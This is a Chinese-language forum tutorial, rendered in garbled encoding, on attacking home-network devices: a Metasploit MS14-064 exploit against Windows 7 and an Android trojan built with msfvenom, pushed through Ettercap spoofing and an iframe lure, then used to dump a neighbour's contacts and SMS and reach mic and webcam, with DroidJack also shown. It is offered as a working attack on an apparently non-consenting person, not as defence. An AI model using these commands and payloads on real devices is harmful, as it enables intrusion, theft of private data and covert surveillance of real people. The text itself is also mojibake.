Ettercap¹ý³ÌµÚÒ»ÆªÀïÒÑ¾ÑÝÊ¾£¬ÕâÀï²»ÔÚÏêÏ¸Ð´ÁË¡£¡£¡£Ö´ÐÐÍêettercapÒÔºóÎÒÃÇ¹Û²ìÒ»ÏÂmsf 
 
<img width="559" height="275" src="https://www.2k8.org/content/uploadfile/202203/17/072ece78.png" alt="3-5.png" style="vertical-align:middle;" /> 
 
³É¹¦ÁË£¬ÕâÊ±ºòÎÒÃÇ¶Ï¿ªettercap£¬ÈçÍ¼£º 
 
<img width="601" height="335" src="https://www.2k8.org/content/uploadfile/202203/17/3cc95430.png" alt="3-6.png" style="vertical-align:middle;" /> 
ScreenshotÈçÍ¼£º 
 
<img width="601" height="314" src="https://www.2k8.org/content/uploadfile/202203/17/661aa61b.png" alt="3-7.png" style="vertical-align:middle;" /> 
 
<img width="601" height="306" src="https://www.2k8.org/content/uploadfile/202203/17/e5ec0aa1.png" alt="3-8.png" style="vertical-align:middle;" /> 
 
 
µÚËÄÆª  MS14-064 Â©¶´²âÊÔÈëÇÖwin7 
 
   ÎÒ·¢ÏÖmsfÏÂµÄexpÖ»ÄÜÕë¶Ô´øÓÐpowershellµÄ»úÆ÷½øÐÐ¹¥»÷£¬ÎÒÃÇÓÃÈçÏÂ·½·¨À´¸ãÑÝÊ¾ 
¿ªÆômsfÖ´ÐÐÃüÁîuse exploits/windows/browser/ms14_064_ole_code_executionÈçÍ¼£º 
 
 
<img width="599" height="354" src="https://www.2k8.org/content/uploadfile/202203/17/2c9b9875.png" alt="4-1.png" style="vertical-align:middle;" /> 
 
È»ºóÖ´ÐÐÃüÁî set PAYLOAD windows/meterpreter/reverse_tcp 
            set AllowPowershellPrompt true 
            Set LHOST 192.168.0.109 
            set SRVHOST 192.168.0.109 
            Set uripath share 
            Set srvport 80 
 
show options 
 
<img width="600" height="314" src="https://www.2k8.org/content/uploadfile/202203/17/9c2ca0c0.png" alt="4-2.png" style="vertical-align:middle;" /> 
 
ÏÂÃæÎÒÃÇÀ´·ÃÎÊ±¾µØµØÖ·³É¹¦ÈçÍ¼£º 
 
<img width="600" height="284" src="https://www.2k8.org/content/uploadfile/202203/17/c2d10f26.png" alt="4-3.png" style="vertical-align:middle;" /> 
 
 
µÚÎåÆª  msf+ettercapÈëÇÖÁÚ¾Ó°²×¿ÊÖ»ú 
 
Ê×ÏÈÆô¶¯msf 
ÏÈÓÃkaliÉú³ÉÒ»¸ö°²×¿Ä¾Âí£¬ÈçÏÂÃüÁî£º 
Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 
 
 
<img width="600" height="414" src="https://www.2k8.org/content/uploadfile/202203/17/073bc6a6.png" alt="5-1.png" style="vertical-align:middle;" /> 
 
ÎªÁËÄÜÈÃ¶Ô·½ÏÂÔØÒÔºó°²×°ÎÒÕâÀï½«ÂíµÄÃû×ÖÃüÃûÎªribenav.apk,¹þ¹þÁÚ¾Ó¿ÉÊÇ¸ö¡°´óÉ«¹í¡±£¬¾Í²»ÊÊÓÃÌæ»»ÏÂÔØµÄ·½·¨ÁË£¬¾ÝÎÒËùÖª£¬ÁÚ¾ÓÆµ·±Ê¹ÓÃÊÖ»úä¯ÀÀÆ÷ä¯ÀÀÐÂÎÅ 
È»ºó½øÈëmsf 
use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set LHOST 192.168.0.109 //ipÎªkailiµÄip 
set LPORT 44444 //¶Ë¿ÚÒ»¶¨ÒªÓëÇ°ÃæÉú³ÉµÄÄ¾ÂíµÄ¶Ë¿ÚÒ»ÖÂ 
Exploit 
 
<img width="601" height="306" src="https://www.2k8.org/content/uploadfile/202203/17/94c2a6bc.png" alt="5-2.png" style="vertical-align:middle;" /> 
 
ÏÂÃæÎÒÃÇ¿ªÆôettercap -G 
ÎÒÎïÀíIPÎª 
 
<img width="601" height="318" src="https://www.2k8.org/content/uploadfile/202203/17/6c0f66f6.png" alt="5-3.png" style="vertical-align:middle;" /> 
 
±ðµ½Ê±ºòÔÙ°ÑÎÒÎïÀí»úÆÛÆÁË£¬Ö®Ç°²âÊÔÎïÀí»úÖ»×°ÌÚÑ¶¹Ü¼ÒÊÇ¿ÉÒÔ³É¹¦ÆÛÆµÄ£¬ 
ÏÂÃæÎÒÃÇÀ´ÉèÖÃÒ»ÏÂ 
 
<img width="600" height="371" src="https://www.2k8.org/content/uploadfile/202203/17/a82daba5.png" alt="5-4.png" style="vertical-align:middle;" /> 
 
ÔÚ¿ªÆôÆÛÆÖ®Ç°ÎÒÃÇÏÈ°ÑÉú³ÉµÄapkÂí¶ªµ½kaili var/www/htmlÏÂ£¬²¢´´½¨Ò»¸öindex.htmÎÄ¼þÄÚÈÝÎª£º<iframe src=http://192.168.0.109/ribenav.apk></iframe>,ÒòÎªapkÎÄ¼þÂïÒªÏëÖ±½ÓÌáÊ¾ÏÂÔØ£¬ÓÃiframeÓï¾ä¾ÍOKÁË 
 
<img width="600" height="277" src="https://www.2k8.org/content/uploadfile/202203/17/aa378490.png" alt="5-5.png" style="vertical-align:middle;" /> 
 
ÎÒÃÇÊÔ×Å·ÃÎÊÒ»ÏÂ¿´¿´£¬±ð³öÊ²Ã´´í£¬·ÃÎÊÕý³£¡£¡£ 
 
<img width="601" height="324" src="https://www.2k8.org/content/uploadfile/202203/17/71e31214.png" alt="5-6.png" style="vertical-align:middle;" /> 
 
ÏÂÃæÎÒÃÇ¿ªÊ¼¹¥»÷ 
 
<img width="601" height="336" src="https://www.2k8.org/content/uploadfile/202203/17/c08af175.png" alt="5-7.png" style="vertical-align:middle;" /> 
 
 
´ó¸Å¹ýÁË5·ÖÖÓ¶à£¬·¢ÏÖ·´µ¯³É¹¦ÁË£¬¹þ¹þÀÏ´óÊå»¹²»´íÒ»¿´ÈÕ±¾AV¹þ¹þ¹À¼ÆÉÏ¾¢¾Í°²×°ÁË¡£¡£¡£ 
 
<img width="587" height="282" src="https://www.2k8.org/content/uploadfile/202203/17/454ff125.png" alt="5-8.png" style="vertical-align:middle;" /> 
 
Ö´ÐÐÃüÁî 
dump_contacts    --¡·Õâ¸öÊÇµ¼³öµç»° 
dump_sms                --¡·Õâ¸öÊÇµ¼³öÐÅÏ¢ 
record_mic     Record audio from the default microphone for X seconds 
    webcam_chat    Start a video chat 
    webcam_list    List webcams 
    webcam_snap    Take a snapshot from the specified webcam 
webcam_stream  Play a video stream from the specified webcam 
 
Éú³Éµç»°±¡txt 
 
<img width="600" height="316" src="https://www.2k8.org/content/uploadfile/202203/17/61f0bdd2.png" alt="5-9.png" style="vertical-align:middle;" /> 
 
 
ÎÒÃÇ´ò¿ª¿´Ò»ÏÂµç»°±¡ 
 
<img width="350" height="596" src="https://www.2k8.org/content/uploadfile/202203/17/c813b272.png" alt="5-10.png" style="vertical-align:middle;" /> 
 
<img width="317" height="574" src="https://www.2k8.org/content/uploadfile/202203/17/130ed9e2.png" alt="5-11.png" style="vertical-align:middle;" /> 
 
´ò¿ª¶ÌÐÅ¿´Ò»ÏÂ 
 
<img width="600" height="290" src="https://www.2k8.org/content/uploadfile/202203/17/8f8e72b3.png" alt="5-12.png" style="vertical-align:middle;" /> 
 
ÎÒÃÇÍ¬Ê±ÆÛÆ³ÉDroidJackÄ¾Âí£¬Ê¹ÓÃ·½·¨ÈçÍ¼£º 
 
<img width="600" height="435" src="https://www.2k8.org/content/uploadfile/202203/17/575b562b.png" alt="5-13.png" style="vertical-align:middle;" /> 
 
<img width="600" height="435" src="https://www.2k8.org/content/uploadfile/202203/17/21353cfe.png" alt="5-14.png" style="vertical-align:middle;" /> 
ÇÐ¼ÇÔÚÇ°ÃæÉú³ÉÍêÂíÒÔºó¼ÇµÃÔÚÕâÀïÑ¡Ôñ¿ª¹ØÎªon£¬²¢ÇÒ¶ÔÓ¦Ç°ÃæÉú³ÉÂíµÄÊ±ºòµÄ¶Ë¿Ú·ñÔòÉÏÏß²»ÁË 
 
 
<img width="600" height="433" src="https://www.2k8.org/content/uploadfile/202203/17/16fa56d5.png" alt="5-15.png" style="vertical-align:middle;" /> 
 
 
ÎÄ¼þ¹ÜÀíÈçÍ¼£º 
 
<img width="600" height="319" src="https://www.2k8.org/content/uploadfile/202203/17/51897406.png" alt="5-16.png" style="vertical-align:middle;" /> 
 
¶ÌÐÅ¹ÜÀíÈçÍ¼£º 
 
<img width="600" height="553" src="https://www.2k8.org/content/uploadfile/202203/17/0348aa39.png" alt="5-17.png" style="vertical-align:middle;" /> 
 
²é¿´°²×°appÈçÍ¼£º 
 
<img width="599" height="299" src="https://www.2k8.org/content/uploadfile/202203/17/7e0cd735.png" alt="5-18.png" style="vertical-align:middle;" /> 
 
²é¿´ä¯ÀÀ¹ýµÄÍøÒ³ÈçÍ¼£º 
 
 
<img width="601" height="430" src="https://www.2k8.org/content/uploadfile/202203/17/2d472822.png" alt="5-19.png" style="vertical-align:middle;" />


 

<link rel="File-List" href="https://qq.vin/admin/ad5bb1a61ae2701733a498a4a748769a.files/filelist.xml" /><link rel="Edit-Time-Data" href="https://qq.vin/admin/ad5bb1a61ae2701733a498a4a748769a.files/editdata.mso" /><link rel="themeData" href="https://qq.vin/admin/ad5bb1a61ae2701733a498a4a748769a.files/themedata.thmx" /><link rel="colorSchemeMapping" href="https://qq.vin/admin/ad5bb1a61ae2701733a498a4a748769a.files/colorschememapping.xml" />
<style>

</style>

Ò³: [1]

ÖÐ¹úÍøÂçÉøÍ¸²âÊÔÁªÃË's Archiver

¼ÒÍ¥ÄÚÍøÉøÍ¸´óÔÓ»â